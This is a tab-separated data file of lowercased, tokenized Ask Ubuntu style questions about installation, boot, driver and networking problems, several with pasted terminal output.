293683	npm install ws does n't work	i want to implement a websocket server in node.js . for that i want to install 'ws ' . i 've already installed npm and node.js in my ubuntu system . now i 'm trying to run the command 'sudo npm install ws ' but it does n't work . i 'm pasting the content of my terminal . can someone help ? root @ neeraj : /home/neeraj # npm install ws npm http get https : //registry.npmjs.org/ws npm err ! error : failed to fetch from registry : ws npm err ! at /usr/share/npm/lib/utils/npm-registry-client/get.js:139:12 npm err ! at cb ( /usr/share/npm/lib/utils/npm-registry-client/request.js:31:9 ) npm err ! at request._callback ( /usr/share/npm/lib/utils/npm-registry- client/request.js:136:18 ) npm err ! at request.callback ( /usr/lib/nodejs/request/main.js:119:22 ) npm err ! at request. < anonymous > ( /usr/lib/nodejs/request/main.js:212:58 ) npm err ! at request.emit ( events.js:88:20 ) npm err ! at clientrequest. < anonymous > ( /usr/lib/nodejs/request/main.js:209:10 ) npm err ! at clientrequest.emit ( events.js:67:17 ) npm err ! at clientrequest.onerror ( /usr/lib/nodejs/request/tunnel.js:164:21 ) npm err ! at clientrequest.g ( events.js:156:14 ) npm err ! you may report this log at : npm err ! < http : //bugs.debian.org/npm > npm err ! or use npm err ! reportbug -- attach /home/neeraj/npm-debug.log npm npm err ! npm err ! system linux 3.2.0-29-generic-pae npm err ! command `` node '' `` /usr/bin/npm '' `` install '' `` ws '' npm err ! cwd /home/neeraj npm err ! node -v v0.6.12 npm err ! npm -v 1.1.4 npm err ! message failed to fetch from registry : ws npm err ! npm err ! additional logging details can be found in : npm err ! /home/neeraj/npm-debug.log npm not ok root @ neeraj : /home/neeraj #
293693	how to install skype with ubuntu 13.04	jovan @ jovan-hp-probook-4540s : ~ $ sudo apt-get install skype reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : skype : depends : skype-bin e : unable to correct problems , you have held broken packages .
293696	where are the evolution data files stored ?	given that i do use evolution , and that i have the ubuntu 12.10 , and that i have neither a ~/.evolution nor a ~/.gconf/.evolution file , where are the evolution files please ? in particular , every time i try to modify a certain contact evolution crashes , among other problems . yes , i 've reported the bug . so i thought i 'd modify the database or xml file directly . based on a find command , i suppose the evolution files are in ~/.local/share/evolution/
293700	select monitor for indicator information	i 'm running ubuntu 13.04 on a computer with two monitors . the indicators are visible in the upper right corner of both monitors , but if an indicator has notifications to show ( such as the arrival of mail ) , that information is only displayed on the right-hand monitor . can i change that so the information is displayed on the left monitor ?
293701	how to install ruby ripper , or another app that does mp3s through a gui	i have tried to install ruby ripper various times ( raring ) using code pasted from the internet . everytime i get to sudo apt-get install rubyripper , i get this back : e : unable to locate package rubyripper i would like to install something that will let me rip mp3s , and modify the rip setting . rhythm box seems to only rip a thing called ogg vorbis . i would like to install something that will let me rip mp3s through a gui .
293703	in settings menu `` background '' entry appears rather than `` appearance ''	'' appearance '' still appears in the dash but opening it only opens system settings . i have a feeling this problem is related to this one
293704	how to make folders ' seen ' by plex	when i want to add a folder to plex i can not find it . i have 2 harddrives in my computer . ubuntu 13 installed on the 120gb ssd and another 1tb normal harddrive which contains 1 folder called 'films ' . in that folder there are many other folders with films in it . when i add a movie section from plex i can select the 1tb harddrive . so the drive is recognized . but afterwards i can not select the folder 'films ' althoug it is there . the filemanager ( second icon from the top on menu bar ) does show the folder . any clue how i can make sure plex recognizes this folder so i can select it ?
293705	how do i control the order of nameserver addresses in resolv.conf ?	i need to re-order /etc/resolv.conf to list the nameserver provided by eth1 dhcp before the nameserver provided by eth0 dhcp on a 12.04 server ( no networkmanager ) . i edited /etc/resolveconf/interface-order and replaced its 'eth* ' entry with ; eth1 eth0 then tried resolvconf -u , ifdown'ed and ifup'ed each interface , dpkg-reconfigure resolvconf , service networking restart and rebooted . none of this had any effect on the order of resolv.conf . what am i missing ?
293707	how can i animate my mouse for screencasts ?	i need to create some screencast tutorials , and i would like to animate my mouse for this purpose . e.g . ideally i would like my mouse to be highlighted , to use an animation when clicking , and possibly to show click and drags . can anyone suggest a solution ? i am happy using gtk-record-my-destop for the screencasts .
293708	how to configure 12.04.2 network without being connected ?	when i use the `` network '' tool from the `` system settings '' application , it wo n't let me configure the wired interface unless the cable is attached and `` live '' . i want to move machines from one network to another and i want to reconfigure them when they are on neither network . otherwise , they are on the `` wrong '' network and the folks in the noc become concerned . how can i get the network tool to let me configure the machines offline ? ( i know i can almost do what i want by editing /etc/network/interfaces , but i really prefer to use the network tool instead . )
293711	connecting to wireless network	how do i connect to a wireless network without a internet connection . i do n't have any windows os running along side my ubuntu 12.04 lts . pci card : 54mbps wireless netgear wg311v3 .
293715	only load ubuntu from recovery mode ... after like the 10th time	i run an asus laptop and dual boot between windows 7 and ubuntu . for some reason , i can only boot to recovery mode in an older version . usually though , i get a watchdog error and have to unplug my laptop and keep retrying until it sticks eventually . below are some images i see while going through this . i 'm really worried about killing my laptop by pulling the plug so much when i get the watchdog error but i do n't know any other way besides keep redoing this process of : try recovery , fail , pull plug , try different recovery , fail , pull plug ... eventually works . any help or guidance would really be helpful !
293718	can we use compiz or kwin on mir ?	i like to customize my desktop , so is there any compiz replacement for mir ? edit : i mean , can we customize ( unity next ) and use compiz on it ?
293720	13.04 not working period	i have reinstalled this 4 times now and cant seem to get it to boot now . i have a phenom x6 amd on a gigabyte mb with 8 gigs of ram and a galaxy geforce 210 gpu . everything i have read is pointing to the nvidia and the current kernel but cant find any work arounds to get it to even load to a working state . i am also getting recursive fault errors , and have no clue what they are talking about . i am almost to the point of dropping ubuntu all together if they can not fix this debacle unless someone has any thing that will help with this . thanks for your help in advance .
293722	how to manage music ipod touch 4g ios6 ubuntu 13.04	i am using ubuntu 13.04 and my ipod has has ios6 , and its 4g . i have already tried libimobiledevice and also tried it with gtkp which says `` error initialising ipod : unsupported checksum type '' . i really want this feature as i do not want to depend on windows for my music transfer to ipod . i don mind if i have to manually organize my music ( instead of syncing i mean ) but i really want to make it work help please !
293726	how to use xserver-xorg-video-modesetting ?	i 've installed xserver-xorg-video-modesetting , the generic modesetting driver . how can i use it ? can i now dynamically switch the resolution in virtual terminals ( ctrl + alt + f1 ) without editing grub and without reboot ?
293728	how can i be able to start windows 7 from ubuntu , and not from grub ?	while i was in windows 7 , i once changed my system settings to have ubuntu starting automatically , and since then i do n't know how to run windows again ( what a stupid thing i did ) . since i ca n't run windows , i 'm unable to uninstall ubuntu , which i have installed inside windows , as wubi . please let me know if there is anyway i can solve this problem . i 'm using windows 7 and ubuntu 13.04 .
293729	toshiba tecra m3-s636 fan control	i cant seem to figure out how to control my fanspeed . the laptop is getting too hot and shutting down after i upgraded to new 12.04 ubuntu . the fan does not sound like it is running as fast as normal . please help
293731	boot error after installing ubuntu 12.04.2 lts	english i installed ubuntu 12.04.2 lts , but when i boot without using the cd the following error occurs : error : file not found grub rescue > and then i do not know what else to do , can someone help me , i need it a lot . português eu instalei o ubuntu 12.04.2 lts , mais ao iniciar sem utilizar o cd o erro abaixo ocorre : error : file not found grub rescue > e ai eu não sei mais o que fazer , alguém pode me ajudar estou precisando muito .
293732	direct file downloads based off file extension ?	is it possible to make it that whenever i download a file , it is redirected to a certain folder based on its file extension ? eg , *.jpg , *.gif , *.png , etc , that it downloads to my pictures folder , *.mov , *.mpeg , *.wmv , etc , to movies , etc . edit possibly through google chrome extensions ?
293739	unable to install vim	i am running ubuntu 13.04 and i assumed that vim comes by default . there is a /etc/vim on my system ( assuming it refers to the same thing ) . however , i was unable to do a vim abc.txt . instead , i got a reply stating that vim is not recognized . please refer to the following and provide me a solution . rahul @ hpdv6 : ~/downloads/vim/vim64/src $ sudo apt-get install vim reading package lists ... done building dependency tree reading state information ... done package vim is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'vim ' has no installation candidate rahul @ hpdv6 : ~/downloads/vim/vim64/src $ thanks in advance .
293749	amazon results not showing in dash	i really like amazon search showing up on dash . i 've made a clean install of 13.04 and initially i would get results from amazon and ubuntu music store . for instance , searching for 'rush presto ' would return the album presto from the canadian band rush . right now , this isn`t working any more and i can only get results from ubuntu music store . i ca n't find my favourite artists in ums yet so i really like the amazon option . so is there a to find out why amazon searches are not being shown any more , only ubuntu`s music store ? how can i turn this on again ?
293759	fan speed and heating problem on macbook pro 9,2 running ubuntu 13.04	i used to run ubuntu 12.04 with vmware on my macbook pro 13 inch ( 9,2 ) . yesterday i installed ubuntu 13.04 with dual boot with refit . i started facing over heating problem while running ubuntu even on very low loads ( for example fetching mails through thunderbird ) . i installed macfanctld which solved the over heating problem but now the fans are making a lot of noise . they keep on running all the time on high speed . can anyone tell me how to fix it ? thanks .
293767	ca n't get music to play in doomsday 1.10.2 in ubuntu precise	i had an older version of the doomsday engine , and i got the music and sound effects just fine . i recently upgraded to the 1.10.2 version with all the extras and although i have the sound effects , nothing i do seems to be able to get the music to play . i 've googled every possible permutation of `` doomsday '' `` ubuntu '' `` linux '' and `` music '' and i 've come up empty . anyone have any ideas ? i have the wad files for the full commercial versions of doom , doom2 , heretic and hexen .
293768	ca n't get ubuntu 13.04 64bit to boot after upgrading mobo , cpu , and memory	i 'm currently running ubuntu 13.04 64 bit on a custom computer . today i upgraded my mobo , cpu and memory . my old configuration was asus a8n-sli deluxe mobo and a amd athlon 64 fx-60 dual core processor x 2 with 4 gb ram . my new configuration is gigabyte 990fxa-ud3 motherboard , a amd fx-8350 cpu with 16gb ram . everything else stayed the same ( ie hard drive , gpu , etc . ) except i removed the sound card and both dvd drives because they were outdated . after installing the new hardware i tried to boot linux from my hdd and got this screen : gnu grub version 2.00-13ubuntu3 with 4 options : ubuntu , advanced options for ubuntu , memory test ( memtest86+ ) , memory test ( memtest 86+ , serial console 115200 ) when selecting ubuntu , i get this : gave up waiting for root device . common problems : -boots args ( cat /proc/cmdline ) - check rootdelay= ( did the system wait long enough ? ) - check root= ( did the system wait for the right device ? ) -missing modules ( cat /proc/modules ; 1s /dev alert ! /dev/mapper/ubuntu -- vg -- root does not exist . dropping to a shell ! busybox v1.20.2 ( ubuntu 1:1.20.0-8ubuntu1 ) built in shell ( ash ) enter 'help '' for a list of built in commands . ( initramfs ) _ i ca n't enter help on that screen , the keyboard does n't seem to work . any help would be greatly appreciated .
293770	burg error after removing entries	hi i installed burg lately using commands sudo add-apt-repository ppa : n-muench/burg sudo apt-get update sudo apt-get install burg burg-themes sudo burg-install /dev/hda sudo update-burg and later i deleted some entries using grub customizer . since then burg is not working properly . i tried to reinstall burg the same problem exist.this is how my command line and emulator looks while reinstalling bijo @ bijo-desktop : ~ $ sudo apt-get install burg burg-themes [ sudo ] password for bijo : reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : burg-emu the following new packages will be installed : burg burg-emu burg-themes 0 upgraded , 3 newly installed , 0 to remove and 11 not upgraded . need to get 0 b/7,980 kb of archives . after this operation , 12.1 mb of additional disk space will be used . do you want to continue [ y/n ] ? y selecting previously unselected package burg-emu . ( reading database ... 369701 files and directories currently installed . ) unpacking burg-emu ( from ... /burg-emu_1.98+20100623-2.3_i386.deb ) ... selecting previously unselected package burg-themes . unpacking burg-themes ( from ... /burg-themes_1.98+20100623-2_all.deb ) ... selecting previously unselected package burg . unpacking burg ( from ... /burg_1.98+20100623-2.3_i386.deb ) ... setting up burg-emu ( 1.98+20100623-2.3 ) ... setting up burg-themes ( 1.98+20100623-2 ) ... setting up burg ( 1.98+20100623-2.3 ) ... bijo @ bijo-desktop : ~ $ sudo burg-install /dev/sda installation finished . no error reported . bijo @ bijo-desktop : ~ $ sudo update-burg generating burg.cfg ... found linux image : /boot/vmlinuz-3.2.0-41-generic found initrd image : /boot/initrd.img-3.2.0-41-generic found linux image : /boot/vmlinuz-3.2.0-40-generic found initrd image : /boot/initrd.img-3.2.0-40-generic found linux image : /boot/vmlinuz-3.2.0-39-generic found initrd image : /boot/initrd.img-3.2.0-39-generic found linux image : /boot/vmlinuz-3.2.0-38-generic found initrd image : /boot/initrd.img-3.2.0-38-generic found linux image : /boot/vmlinuz-3.0.0-12-generic found initrd image : /boot/initrd.img-3.0.0-12-generic found microsoft windows xp professional on /dev/sdb1 grep : input file `/boot/burg/burg.cfg.new ' is also the output done bijo @ bijo-desktop : ~ $ sudo burg-emu can anyone please help ? thank you
293773	failed linux kernel firmware update	ok guys this is what i get reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : linux-firmware 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 23.1 mb of archives . after this operation , 23.6 kb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //archive.ubuntu.com/ubuntu/ precise-updates/main linux-firmware all 1.79.4 [ 23.1 mb ] fetched 23.1 mb in 1min 48s ( 213 kb/s ) ( reading database ... 367107 files and directories currently installed . ) preparing to replace linux-firmware 1.79.1 ( using ... /linux-firmware_1.79.4_all.deb ) ... unpacking replacement linux-firmware ... dpkg : error processing /var/cache/apt/archives/linux-firmware_1.79.4_all.deb ( -- unpack ) : trying to overwrite '/lib/firmware/amd-ucode/microcode_amd_fam15h.bin ' , which is also in package amd64-microcode 1.20120910-1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/linux-firmware_1.79.4_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
293774	what is the default clipboard manager in xubuntu ?	i do n't care about panel plugins or programs such as xclip or xsel . i just want to know : when i cut or paste something on xubuntu , what program handles it ?
293775	ubuntu freezing during installation	i planned on upgrading my pc to ubuntu from windows 7 , and erasing windows 7 completely . i ran through the installation , choosing to erase my current os and install ubuntu 12.04.2 lts . after a while , the installer froze my pc completely , something i thought would be normal , so i waited . i figured it would be finished by the time i had gotten back , so i went out for dinner , and to visit some open house art gallery with a friend , and returned about 5 or 6 hours later to see the screen has not changed . i rebooted my computer to find out that the bios and such is n't being read off the flash drive on start-up , but also that my pc has neither ubuntu or windows 7 installed .
293778	setting the same theme across desktop environments	i 'm currently running 13.04 gnome-shell . it 's customised just the way i like it . however , when i switch to unity , the desktop looks really ugly - a real mess ! how can i set one de to look the way i want it to , and when i switch to another de it looks the same ? is this even possible ?
293781	unable to install ubuntu/kubuntu/lubuntu 13.04 uefi on sony vaio sve17137 !	background/hardware : sony vaio sve17137 cxb , pre-installed with windows 8 intel core i7-3632qm mobile intel速 hm76 express chipset amd radeon hd7650m 16 gb ram 1 tb internal drive windows 8 wiped . no dual boot . secure boot is turned off . uefi is on . booting any of the ( u/ku/lu ) buntu installations , i get the split screen error that others have reported with the latest amd mobile graphics controllers . this is n't a problem . once the installation is complete ( assuming it does complete ) , i simply install the latest catalyst distribution , and the split screen problem is gone . regardless of which distribution i use , my disk is partitioned as follows : /dev/sda : gpt partition table /dev/sda1 : 256 mb efi boot partition ( automatically mounted on /boot/efi ) /dev/sda2 : 16 gb swap partition ( overkill . i know . ) /dev/sda3 : 900+ gb ext4 partition mounted on / every attempt at installing one of the three ubuntu distributions mentioned above fails in some way ! ! ! kubuntu ( which i prefer ) and lubuntu fail before completion of the installation . in both cases , i boot up the cd 's , and select `` try ubuntu '' . once in the booted os ( which do work just fine , btw ! ) , i select `` install ubuntu '' . i partition my disk as above , and let it run . both versions fail with one of two fatal errors : '' subprocess installed post-installation script returned error exit status 17 '' '' grub-install dummy fatal error '' the latter sometimes reports a different grub-install failure , which i 've unfortunately forgotten to write down , but it 's essentially the same . regardless , there is no reason for these to fail ! my partitioning is as simple as possible , and i 'm not trying to do anything more than install a single os ! i understand the difficulties with dual booting . they do n't apply . i should add that i 've also tried selecting the `` entire disk '' partitions , where the installer partitions the disk itself . i 've tried both using and not using lvm . the installations fail in the exact same way ! ( and , it should be noted , the partitions created by the installer are essentially the same as mine . ) so , even with virtually zero customization on my part , these installers fail ! ! ! the ubuntu installation acts somewhat differently . it will sometimes just crash on me , but usually it installs successfully ! when i try to log in , the interface freezes . that is somehow linked to the amd split screen error . at that point i just open a console and install the amd catalyst . the split screen error and the login freeze both go away . i log in , and get a blank screen ! that 's all ! ! ! i can right click and change my background . i can create a new document or a new folder . nothing else ! the desktop manager does n't start . i 've re-installed at least a dozen times with the same exact results ! please note , i 've searched and searched for explanations to these errors . i 've tried every single fix i 've been able to find . none of them have helped ! any help would be greatly appreciated ! edit : 5/11/2013 with the help of rod smith 's response , i now have more information to add to my attempts to install kubuntu ... ( although i 'm still failing ! ) the first error message i referenced : '' subprocess installed post-installation script returned error exit status 17 '' was due to the fact that i 'd stupidly turned secure boot back on to test it , and then promptly forgot that i 'd done so ! after turning secure boot off again , i 'm back to the second error : '' grub-install dummy fatal error '' rod , in answer to your suggestions , yes , the installer is installing in efi mode ! the directory you referenced , /sys/firmware/efi does indeed exist . furthermore , when i had secure boot turned on , the first of the error messages happened earlier in the installation process than the grub-install dummy fatal error . therefore , with secure boot on , the /boot/efi directory was never even populated . now that directory contains /boot/efi/efi/kubuntu/grubx64.efi . regardless , now that i 've realized that i 'm an idiot and have corrected my mistake , the installation still continues to fail with : '' grub-install dummy fatal error '' my next test is to try installing in bios mode , using the bios boot partition you mentioned . ( thanks for that ! i did n't know that gpt disks needed that ! ) however , i would very much prefer to boot in efi mode , if at all possible ! googling that error message returns a number of hits , but none of them have helped ! edit : 5/14/2013 rod , there 's too much to write to do so in a comment ... i tried to install refind from your website , but it failed , and i 'm not sure why ! first off , here are the steps that i took : while running the live cd , and after the installation failed , i mounted the following : /dev/sda3 on /mnt /dev/sda1 on /mnt/boot/efi i copied refind-bin-0.6.11.zip onto the system and unzipped it . after unzipping the archive , i cd 'd to it and ran : sudo ./install.sh -- root /mnt but got the error : there were problems running the efibootmgr program ! you may need to rename the refind_x64.efi binary to the default name ( efi/boot/bootx64.efi on x86-64 systems or efi/boot/bootia32.efi on x86 systems ) to have it run ! i used efibootmgr to list out the boot entries , and no change was made to the list . the refind entry was absent . i did n't quite know where to go from there , so i decided i would just do it manually , from the instructions on your website . i generally prefer doing things that way anyway ! believe it or not , i 've been a system administrator for over 25 years ! however , all of my experience has been with sun systems running solaris , and , before that , sunos , as well as quite a bit of experience with windows . i 'm therefore familiar with the basics of linux and , obviously , the gnu software , as most of it is similar to solaris . unfortunately , i have zero experience with uefi ! i 'm using bios on the new windows system i just build , because it was n't worth the time to figure out how to use uefi . well , now it 's time to learn ! anyway , i went through the manual instructions exactly as on your site . ( add sudo before all of these commands . ) : the internal drive is mounted under /mnt and /mnt/boot/efi , as above . from `` refind-bin-0.6.11 '' , ran cp -r refind /mnt/boot/efi/efi/ cd /mnt/boot/efi/efi/refind rm -r drivers_ia32 tools_ia32 refind_ia32.efi cd drivers_x64 ; rm ext2_x64.efi hfs_x64.efi reiserfs_x64.efi ; cd .. ( did n't know if i should keep iso9660_x64.efi , so i kept it . ) mv refind.conf-sample refind.conf and finally , i ran `` efibootmg '' , using the long form options , simply to make it easier for me to read : efibootmgr -- create -- disk /dev/sda -- part 1 -- loader \\efi\\refind\\refind_x64.efi -- label refind -- verbose which returned absolutely nothing . it just returns without any messages or any output whatsoever , which , considering that i specified the ' -- verbose ' option , was a bit of a surprise ! edit : 5/15/2013 so , i was looking through the system logs , and noticed that every time efibootmgr is run , it logs an entry in /var/log/kern.log . according to , well , you , ( in another thread ) , the efivars module is now built into the kernel , and the /sys/firmware/efi directory is evidence of that . so then , one would not expect this in their kernel log : kubuntu kernel : [ 80182.133386 ] efivars : set_variable ( ) failed : status=8000000000000009 kubuntu kernel : [ 80633.493177 ] efivars : set_variable ( ) failed : status=8000000000000009 kubuntu kernel : [ 80696.988083 ] efivars : set_variable ( ) failed : status=8000000000000009 kubuntu kernel : [ 80721.952797 ] efivars : set_variable ( ) failed : status=8000000000000009 kubuntu kernel : [ 80725.893414 ] efivars : set_variable ( ) failed : status=8000000000000009 kubuntu kernel : [ 80790.848496 ] efivars : set_variable ( ) failed : status=8000000000000009 kubuntu kernel : [ 86511.078667 ] efivars : set_variable ( ) failed : status=8000000000000009 i have no idea why these are happening , but , for now , it 's all a moot point ... since i 'd already wiped windows off of this sytstem , i figured i 'd just use the dos bios upgrade tools . i of all people should have known that there was something screwy with their instructions ! i should have searched online about this first , because , for the first time in my life , i have bricked a machine ! ! ! ! : - ( this machine is only a month old , so sony is actually sending someone out to take a look at it . the guy i spoke with seemed to think it would n't be a problem getting it fixed ! there are literally dozens of posts online from vaio owners who have done the same thing when trying to flash their bios in dos ! ! ! so , i wo n't be able to test anything more for a time ! : - ) i 'll be back ! edit : 5/26/2013 and he 's back ... so , rather than continue to try the same thing over and over and expect a different answer , i decided to take an alternate root ! i decided that the easiest way to deal with this was to install the system in legacy mode and then convert it to efi mode . i know that this is n't `` easy '' , but it gives me the advantage that i start with an installed system , rather than running off of cd . that said , this required some `` pre-configuration '' first ... to make this possible at all , i had to partition my disk with both an efi system partition and a bios boot partition ! unfortunately , i discovered that , if you boot the live cd in legacy mode , you can not create an efi partition with the ubiquity installer ! unlike when you boot in efi mode , the selection of the efi system partition is missing from the disk partition interface . note that i could have used rod 's excellent gpt fdisk utility to create the partition table i needed , but i wanted the efi partition setup first . i first booted the live cd in efi mode . i started the installer , so that i could partition my disk as follows : 1 type : fat32 name : efi system flags : boot 2 type : name : bios boot flags : bios_grub 3 type : swap name : linux swap 4 type : ext4 name : linux filesystem i actually let the installer run until it crashed ( as always ) at the efi boot manager installation . i then changed the bios to legacy and did the full install , making sure not to touch the efi partition . and there i am ... while this may sound convoluted ( because it is ! : -d ) , i now at least have a running kubuntu installation , for the first time ! : - ) i do n't know where to go next ! rod , if you see , do you have instructions on how to turn a bios boot with a gpt disk into an efi boot ? i thought you did , but i ca n't find it . as always , any advice , such as : `` you idiot ! what were you thinking ? ! ? no , here is the right way to do it ... '' would be greatly appreciated ! ( in the interest of keeping this cordial , respectful site the way it is , perhaps it would be best to leave out the first part ! ! ! ) thanks !
293786	will not install from thumb drive	i 'm trying to install ubuntu on my wife 's laptop , windows vista had been removed by a previous owner . this was given to us . the previous owner said that the laptop should boot to ubuntu without the usb that i have downloaded ubuntu on to . it says there is not enough memory to install . i ca n't find out how to find out how much actual memory is left . i 'm used to windows and can find it easy . the hardrive should be pretty empy . any ideas ? paul
293792	rtl8192ce drivers not compiling in raring	i recently installed ubuntu 13.0.4 raring ringtail onto my hp pavilion g6 , and i am having trouble compiling the drivers for my rtl8192ce wi-fi adapter . i 've been searching around for a few days now and i have n't had any luck . the driver i 'm attempting to compile and install is here : http : //dl.dropboxusercontent.com/u/57056576/drivers/realtek/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012.tar.gz here 's the error i 'm receiving when i attempt to run the `` make '' command : make -c /lib/modules/3.8.0-19-generic/build m=/home/addison/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 modules make [ 1 ] : entering directory /usr/src/linux-headers-3.8.0-19-generic' cc [ m ] /home/addison/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.o in file included from /home/addison/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:39:0 : /home/addison/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/pci.h:245:15 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rtl_pci_probe’ /home/addison/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c : in function ‘_rtl_init_mac80211’ : /home/addison/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:320:6 : error : ‘ieee80211_hw_beacon_filter’ undeclared ( first use in this function ) /home/addison/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:320:6 : note : each undeclared identifier is reported only once for each function it appears in /home/addison/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c : in function ‘rtl_action_proc’ : /home/addison/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:870:25 : error : ‘rx_flag_mactime_mpdu’ undeclared ( first use in this function ) /home/addison/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c : in function ‘rtl_send_smps_action’ : /home/addison/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:1432:16 : error : ‘struct < anonymous > ’ has no member named ‘sta’ make [ 2 ] : *** [ /home/addison/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.o ] error 1 make [ 1 ] : *** [ _module_/home/addison/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 ] error 2 make [ 1 ] : leaving directory/usr/src/linux-headers-3.8.0-19-generic' make : * [ all ] error 2 here is the information about my machine from `` lspci -nnk | grep -ia2 net '' , `` lsmod '' , `` nm-tool '' , `` nmcli nm status '' , `` iwconfig '' , and `` rfkill list all '' : lspci -nnk | grep -ia2 net 01:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter [ 10ec:8176 ] ( rev 01 ) subsystem : hewlett-packard company device [ 103c:1629 ] kernel driver in use : rtl8192ce 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 05 ) subsystem : hewlett-packard company device [ 103c:1695 ] kernel driver in use : r8169 lsmod module size used by nls_utf8 12557 1 nls_iso8859_1 12713 1 isofs 39815 1 parport_pc 28152 0 ppdev 17073 0 rfcomm 42641 0 bnep 18036 2 bluetooth 228619 10 bnep , rfcomm snd_hda_codec_hdmi 36913 1 snd_hda_codec_idt 70256 1 joydev 17377 0 coretemp 13355 0 kvm 443165 0 ghash_clmulni_intel 13259 0 cryptd 20373 1 ghash_clmulni_intel snd_hda_intel 61623 1 snd_hda_codec 136453 3 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel snd_hwdep 13602 1 snd_hda_codec arc4 12615 2 snd_pcm 97451 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel hp_wmi 18048 0 snd_page_alloc 18710 2 snd_pcm , snd_hda_intel sparse_keymap 13890 1 hp_wmi snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30180 1 snd_seq_midi rtl8192ce 53594 0 rtlwifi 79673 1 rtl8192ce snd_seq 61554 2 snd_seq_midi_event , snd_seq_midi wmi 19070 1 hp_wmi rtl8192c_common 48779 1 rtl8192ce mac80211 606457 3 rtlwifi , rtl8192c_common , rtl8192ce snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29425 2 snd_pcm , snd_seq i915 600351 3 snd 68876 10 snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_hda_codec_idt , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device uvcvideo 80847 0 videobuf2_vmalloc 13056 1 uvcvideo videobuf2_memops 13202 1 videobuf2_vmalloc cfg80211 510937 2 mac80211 , rtlwifi videobuf2_core 40513 1 uvcvideo video 19390 1 i915 soundcore 12680 1 snd drm_kms_helper 49394 1 i915 videodev 129260 2 uvcvideo , videobuf2_core rtsx_pci_ms 13011 0 mac_hid 13205 0 drm 286313 4 i915 , drm_kms_helper lpc_ich 17061 0 psmouse 95870 0 lp 17759 0 i2c_algo_bit 13413 1 i915 memstick 16554 1 rtsx_pci_ms mei 41158 0 parport 46345 3 lp , ppdev , parport_pc microcode 22881 0 serio_raw 13215 0 ext2 72837 1 usb_storage 57204 1 mmc_block 27090 0 hid_generic 12540 0 usbhid 47074 0 hid 101002 2 hid_generic , usbhid rtsx_pci_sdmmc 17475 0 ahci 25731 3 libahci 31364 1 ahci rtsx_pci 33355 2 rtsx_pci_ms , rtsx_pci_sdmmc r8169 67446 0 nm-tool networkmanager tool state : connected ( global ) device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : connected default : yes hw address : 78 : e3 : b5:6d:8c : fa capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.1.73 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.254 dns : 192.168.1.254 device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : rtl8192ce state : unavailable default : no hw address : 20:10:7a:5d:5f : ee capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points nmcli nm status running state wifi-hardware wifi wwan-hardware wwan running connected disabled disabled disabled disabled iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=0 dbm retry long limit:7 rts thr=2347 b fragment thr : off encryption key : off power management : on rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : hp-wifi : wireless lan soft blocked : no hard blocked : yes 2 : hp-bluetooth : bluetooth soft blocked : no hard blocked : yes 3 : hp-wwan : wireless wan soft blocked : no hard blocked : yes -- -- -- -- -- please help me solve this issue . many thanks in advance to those who may have any advice to offer .
293793	porting ubuntu-touch ( no touchscreen , squished landscape )	so , i have the mobile world congress demo working on a nook color , save for two things . the touchscreen does not respond to input , making testing difficult , to say the least . the widgets appear to be squished , the clock widget being eclipsed by ... the eclipse . what would be my best bet for debugging ?
